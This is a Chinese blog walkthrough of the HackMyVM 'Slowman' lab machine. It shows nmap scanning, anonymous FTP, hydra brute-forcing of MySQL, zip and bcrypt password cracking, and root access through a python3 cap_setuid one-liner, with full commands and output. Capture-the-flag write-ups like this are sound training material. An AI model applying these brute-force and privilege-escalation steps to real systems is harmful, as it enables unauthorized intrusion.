devbox
不正经
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[HackMyVM]靶场 Slowman

作者:不正经 | 2024-05-25 10:56:08

[HackMyVM]靶场 Slowman

kali:192.168.56.104

靶机:192.168.56.132

端口扫描

  1. # nmap 192.168.56.132
  2. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-24 15:28 CST
  3. Nmap scan report for 192.168.56.132
  4. Host is up (0.00066s latency).
  5. Not shown: 995 filtered tcp ports (no-response)
  6. PORT     STATE  SERVICE
  7. 20/tcp   closed ftp-data
  8. 21/tcp   open   ftp
  9. 22/tcp   open   ssh
  10. 80/tcp   open   http
  11. 3306/tcp open   mysql

开了20 21 22 80 3306端口

21端口匿名登陆,把passive模式关了

  1. # ftp 192.168.56.132
  2. Connected to 192.168.56.132.
  3. 220 (vsFTPd 3.0.5)
  4. Name (192.168.56.132:root): anonymous
  5. 331 Please specify the password.
  6. Password: 
  7. 230 Login successful.
  8. Remote system type is UNIX.
  9. Using binary mode to transfer files.
  10. ftp> ls
  11. 229 Entering Extended Passive Mode (|||43514|)
  12. ^C
  13. receive aborted. Waiting for remote to finish abort.
  14. ftp> passive
  15. Passive mode: off; fallback to active mode: off.
  16. ftp> ls
  17. 200 EPRT command successful. Consider using EPSV.
  18. 150 Here comes the directory listing.
  19. -rw-r--r--    1 0        0              12 Nov 22 21:46 allowedusersmysql.txt
  20. 226 Directory send OK.
  21. ftp> get allowedusersmysql.txt
  22. local: allowedusersmysql.txt remote: allowedusersmysql.txt
  23. 200 EPRT command successful. Consider using EPSV.
  24. 150 Opening BINARY mode data connection for allowedusersmysql.txt (12 bytes).
  25. 100% |************************************************************************************************|    12        2.03 KiB/s    00:00 ETA
  26. 226 Transfer complete.
  27. 12 bytes received in 00:00 (1.70 KiB/s)
  28. ftp> exit
  29. 221 Goodbye.

有个txt文件,是sql用户名

  1. # cat allowedusersmysql.txt 
  2. trainerjeff

用hydra爆破登录

  1. # hydra -l trainerjeff -P /usr/share/eaphammer/wordlists/rockyou.txt mysql://192.168.56.132
  2. Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  3.  
  4. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-24 15:33:03
  5. [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
  6. [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
  7. [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
  8. [DATA] attacking mysql://192.168.56.132:3306/
  9. [3306][mysql] host: 192.168.56.132   login: trainerjeff   password: soccer1

爆破出来账号密码是trainerjeff/soccer1

连进去看看

  1. # mysql -u trainerjeff -h 192.168.56.132 -p
  2. Enter password: 
  3. Welcome to the MariaDB monitor.  Commands end with ; or \g.
  4. Your MySQL connection id is 1070
  5. Server version: 8.0.35-0ubuntu0.22.04.1 (Ubuntu)
  6.  
  7. Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
  8.  
  9. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  10.  
  11. MySQL [(none)]> show databases;
  12. +--------------------+
  13. | Database           |
  14. +--------------------+
  15. | information_schema |
  16. | mysql              |
  17. | performance_schema |
  18. | sys                |
  19. | trainers_db        |
  20. +--------------------+
  21. 5 rows in set (0.013 sec)
  22.  
  23. MySQL [(none)]> use trainers_db;
  24. Reading table information for completion of table and column names
  25. You can turn off this feature to get a quicker startup with -A
  26.  
  27. Database changed
  28. MySQL [trainers_db]> show tables;
  29. +-----------------------+
  30. | Tables_in_trainers_db |
  31. +-----------------------+
  32. | users                 |
  33. +-----------------------+
  34. 1 row in set (0.004 sec)
  35.  
  36. MySQL [trainers_db]> select * from users;
  37. +----+-----------------+-------------------------------+
  38. | id | user            | password                      |
  39. +----+-----------------+-------------------------------+
  40. |  1 | gonzalo         | tH1sS2stH3g0nz4l0pAsSWW0rDD!! |
  41. |  2 | $SECRETLOGINURL | /secretLOGIN/login.html       |
  42. +----+-----------------+-------------------------------+

有用户gonzalo的账号密码并且给了登录界面 /secretLOGIN/login.html 

gonzalo/tH1sS2stH3g0nz4l0pAsSWW0rDD!!

进去有压缩包文件

爆破一下

  1. # fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u  credentials.zip 
  2.  
  3.  
  4. PASSWORD FOUND!!!!: pw == spongebob1

一下就爆出来了密码是spongebob1

  1. # unzip credentials.zip 
  2. Archive:  credentials.zip
  3. [credentials.zip] passwords.txt password: 
  4.   inflating: passwords.txt           
  5.                                                                                                                                              
  6. ┌──(root㉿kali2)-[~/Desktop]
  7. └─# cat passwords.txt        
  8. ----------
  9. $USERS: trainerjean
  10.  
  11. $PASSWORD: $2y$10$DBFBehmbO6ktnyGyAtQZNeV/kiNAE.Y3He8cJsvpRxIFEhRAUe1kq

用john爆破一下这个hash

  1. # john abc.txt 
  2. Using default input encoding: UTF-8
  3. Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
  4. Cost 1 (iteration count) is 1024 for all loaded hashes
  5. Proceeding with single, rules:Single
  6. Press 'q' or Ctrl-C to abort, almost any other key for status
  7. Almost done: Processing the remaining buffered candidate passwords, if any.
  8. Proceeding with wordlist:/usr/share/john/password.lst
  9. tweety1          (?)     
  10. 1g 0:00:04:31 DONE 2/3 (2024-03-24 15:50) 0.003681g/s 39.19p/s 39.19c/s 39.19C/s trevor1..unicorn1
  11. Use the "--show" option to display all of the cracked passwords reliably
  12. Session completed.

爆破出来密码是tweety1

ssh连接直接拿到user flag,还有一个python历史指令

  1. trainerjean@slowman:~$ cat .python_history 
  2. import os
  3. os.system('bash')
  4. os.system('0')
  5. os.setid('0')
  6. os.setuid('0')
  7. exit

提权应该与python有关

/home下还有两个用户 不过都没权限进去

  1. trainerjean@slowman:~$ ls /home
  2. gonzalo  trainerjean  trainerjeff

想 提权root,尝试了sudo -l,无果,尝试看进程定时任务 无果

linpeas跑一下发现python有capabilities

  1. ╔══════════╣ Capabilities
  2. ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                              
  3. Current env capabilities:                                                                                                                    
  4. Current: =
  5. Current proc capabilities:
  6. CapInh: 0000000000000000
  7. CapPrm: 0000000000000000
  8. CapEff: 0000000000000000
  9. CapBnd: 000001ffffffffff
  10. CapAmb: 0000000000000000
  11.  
  12. Parent Shell capabilities:
  13. 0x0000000000000000=
  14.  
  15. Files with capabilities (limited to 50):
  16. /snap/core20/2015/usr/bin/ping cap_net_raw=ep
  17. /snap/core20/1974/usr/bin/ping cap_net_raw=ep
  18. /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
  19. /usr/bin/python3.10 cap_setuid=ep
  20. /usr/bin/mtr-packet cap_net_raw=ep
  21. /usr/bin/ping cap_net_raw=ep

那就python的capabilities提权了

  1. trainerjean@slowman:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  2. # id
  3. uid=0(root) gid=1002(trainerjean) groups=1002(trainerjean)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/621738
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号